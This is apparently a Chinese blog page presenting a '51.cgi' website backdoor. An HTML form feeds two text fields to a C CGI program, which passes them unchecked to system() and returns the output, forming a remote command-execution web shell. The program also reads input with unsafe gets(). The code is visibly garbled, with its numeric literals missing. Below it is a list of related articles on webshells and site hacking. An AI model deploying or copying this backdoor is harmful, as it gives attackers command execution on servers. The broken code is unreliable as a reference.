• 运行截图:
  • html开发: 
     <html>
    
 <body>
    
     <form id="form" name="form" method="post" action="../cgi-bin/run.cgi">
    
         <p></p>
    
         <input type="text" name="cmd1" id="user" >
    
         <p></p>
    
         <input type="text" name="cmd2" id="pass" >
    
         <p></p>
    
         <input type="submit" name="go" id="run" value="submit">
    
     </form>
    
 </body>
    
 </html>
  • cgi开发 
     #define _CRT_SECURE_NO_WARNINGS
    
 #include <stdio.h>
    
 #include <stdlib.h>
    
 #include <time.h>

 void main()
    
 {
    
     //显示html文本
    
     printf("Cotent-type:text/html\n\n");
    
     //获取表单信息
    
     char szpost[] = {  };
    
     gets(szpost);
    
     //输出表单信息
    
     printf("%s", szpost);

     //对表单信息进行处理,把'+'转换成' '
    
     char *pstart = szpost;
    
     for(int i=;i<;i++)
    
     {
    
         if (szpost[i] == '+')
    
         {
    
             szpost[i] = ' ';
    
         }
    
     }

     //处理':'号
    
     char *pos1 = strstr(szpost, "%3A");
    
     if (pos1 != NULL)
    
     {
    
         *pos1 = ':';
    
         *(pos1 + ) = ' ';
    
         *(pos1 + ) = ' ';
    
     }

     //处理'\'
    
     pos1 = strstr(szpost, "%2F");
    
     if (pos1 != NULL)
    
     {
    
         *pos1 = '\\';
    
         *(pos1 + ) = ' ';
    
         *(pos1 + ) = ' ';
    
     }

     //获取第一个输入框的内容
    
     char *p1 = strchr(szpost, '&');
    
     if (*p1 != NULL)
    
     {
    
         *p1 = '\0';
    
     }
    
     //输出第一个输入框的内容
    
     printf("%s\r\n", szpost+);

     //获取第二个输入框的内容
    
     char *p2 = strchr(p1 + , '&');
    
     if (*p2 != NULL)
    
     {
    
         *p2 = '\0';
    
     }
    
     //输出第二个输入框的内容
    
     printf("%s\r\n",p1+);

     //整合成cmd指令
    
     char cmd[] = {  };
    
     //生成随机数,写入到随机数文件中
    
     time_t ts;
    
     unsigned data = time(&ts);
    
     srand(&ts);
    
     int num = rand();

     //整合cmd指令,并重定向到文件
    
     sprintf(cmd, "%s %s >%d.txt", szpost + , p1 + , num);
    
     //文件名
    
     char filename[] = {  };
    
     //生成文件名
    
     sprintf(filename,"%d.txt", num);
    
     //执行指令
    
     system(cmd);
    
     //打开文件
    
     FILE *pf = fopen(filename,"r");
    
     //读取文件
    
     while (!feof(pf))
    
     {
    
         char ch = fgetc(pf);
    
         putchar(ch);
    
     }
    
     //关闭文件
    
     fclose(pf);
    
 }

51.cgi网站后门的更多相关文章

  1. 网站后门shell-----eval

    我们先来看看网站被攻击的代码: <?php error_reporting(E_ERROR); unlink('user.php'); unlink('../member/login.php') ...

  2. thinkphp网站后门-发现后门(Webshell)文件

    不知道能不能解决, 1.登录阿里云后台,找到后门文件删除 2.执行 中国镜像 composer config -g repo.packagist composer https://packagist. ...

  3. 动态网站技术CGI

    递信息的规程.CGI规范允许Web服务器执行外部程序,并将它们的输出发送给Web浏览器,CGI将Web的一组简单的静三种主流的动态网站技术: ASP JSP PHP 除之外,此还要了解的动态网站技术 ...

  4. 阿里云提醒 网站被WebShell木马后门的处理过程

    昨晚凌晨收到新客户的安全求助,说是阿里云短信提示,网站有webshell木马文件被植入,我们SINE安全公司立即成立,安全应急响应小组,客户提供了阿里云的账号密码,随即登陆阿里云进去查看到详情,登陆云 ...

  5. 360在线网站安全检测,web安全测试AppScan扫描工具,XSS常用的攻击手法

    360在线网站安全检测,web安全测试AppScan扫描工具,XSS常用的攻击手法 如何做好网站的安全性测试 360网站安全检测 - 在线安全检测,网站漏洞修复,网站后门检测http://websca ...

  6. 企业网站被黑 dedecms漏洞修复办法

    前段时间网站被黑了,从百度打开网站直接被劫持跳转到了彩票,du博网站上去,网站的首页index.html文件也被篡改成一些什么北京sai车,pk10,一些cai票的关键词内容,搞得网站根本无法正常浏览 ...

  7. 修复网站漏洞对phpmyadmin防止被入侵提权的解决办法

    phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多一些,最近phpmysql爆出漏洞,尤其是弱口令,sql注入漏洞,都会导致mysql的数据账号密码被泄露,那么如 ...

  8. Python3 CGI编程实现教程

    一.背景说明 虽然很久以前就听说“早期的网站很多通过cgi形式实现”.“C++可通过CGI形式编写网页”,日积月累对CGI也有了一些概念,但一直没真正见过一个实际运行的CGI网站,总归还是有些底气不足 ...

  9. 手把手教你查看网站遭受到的Web应用攻击类型

    常见Web应用攻击类型有:webshell.SQL注入.文件包含.CC攻击.XSS跨站脚本攻击.敏感文件访问.远程命令.恶意扫描.代码执行.恶意采集.特殊攻击.其他攻击十二种攻击类型. 如何查看网站遭 ...

随机推荐

  1. IIS 7.5 配置

    安装 MVC 3 对应版本. 或者对应的版本. 登陆时候报错 检查下面几项是否配置正确 检查ASP.net 是否开启. 检查网站的应用池是否配置正确 在处理程序映射当中检查这几项是否配置正确 如果都配 ...

  2. 前端验证银行卡(Luhn校验算法)

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  3. CMake入门之创建一个基于PCL的最小工程

    最近在学习PCL,借助Cmake可省去繁琐的添加包含目录和依赖库操作. 一个典型的CMakeLists.txt内容通常为: cmake_minimum_required(VERSION 2.6 FAT ...

  4. 机器学习(一) K-means聚类

    聚类算法K-means是硬聚类算法,是目标函数聚类算法的代表.K-means算法以欧式距离作为相似度测度,它是求对应某一初始聚类中心向量V最优分类,使得评价指标J最小.算法采用误差平方和准则函数作为聚 ...

  5. sql 知识点

    1 聚集索引和非聚集索引的区别 聚集索引是指 表中存储的数据按照索引的顺序来存储,数据检索效率高,但是对数据更新影响较大:非聚集索引是数据存储在一个地方,索引存储在另一个地方:索引带有指针,指向数据的 ...

  6. Highcharts 前端图表插件

    Highcharts 支持将图片下载成各种格式 Highcharts官网:https://www.hcharts.cn/download <div id="container" ...

  7. ES6学习笔记(十五)Generator函数的异步应用

    1.传统方法 ES6 诞生以前,异步编程的方法,大概有下面四种. 回调函数 事件监听 发布/订阅 Promise 对象 Generator 函数将 JavaScript 异步编程带入了一个全新的阶段. ...

  8. linux下搭建NFS服务器

    服务端:10.6.191.183 客户端:10.6.191.182 NFS 是Network File System的缩写,即网络文件系统.一种使用于分散式文件系统的协定,由Sun公司开发,于1984 ...

  9. 【Henu ACM Round#16 E】Paths and Trees

    [链接] 我是链接,点我呀:) [题意] 在这里输入题意 [题解] 感觉很像一道最短路. 然后就试了一发. 结果真的是.. 只要用一个优先队列优化的dijkstra算法求出每个点的最短路上的前一个点是 ...

  10. 【Codeforces Round #420 (Div. 2) C】Okabe and Boxes

    [题目链接]:http://codeforces.com/contest/821/problem/C [题意] 给你2*n个操作; 包括把1..n中的某一个数压入栈顶,以及把栈顶元素弹出; 保证压入和 ...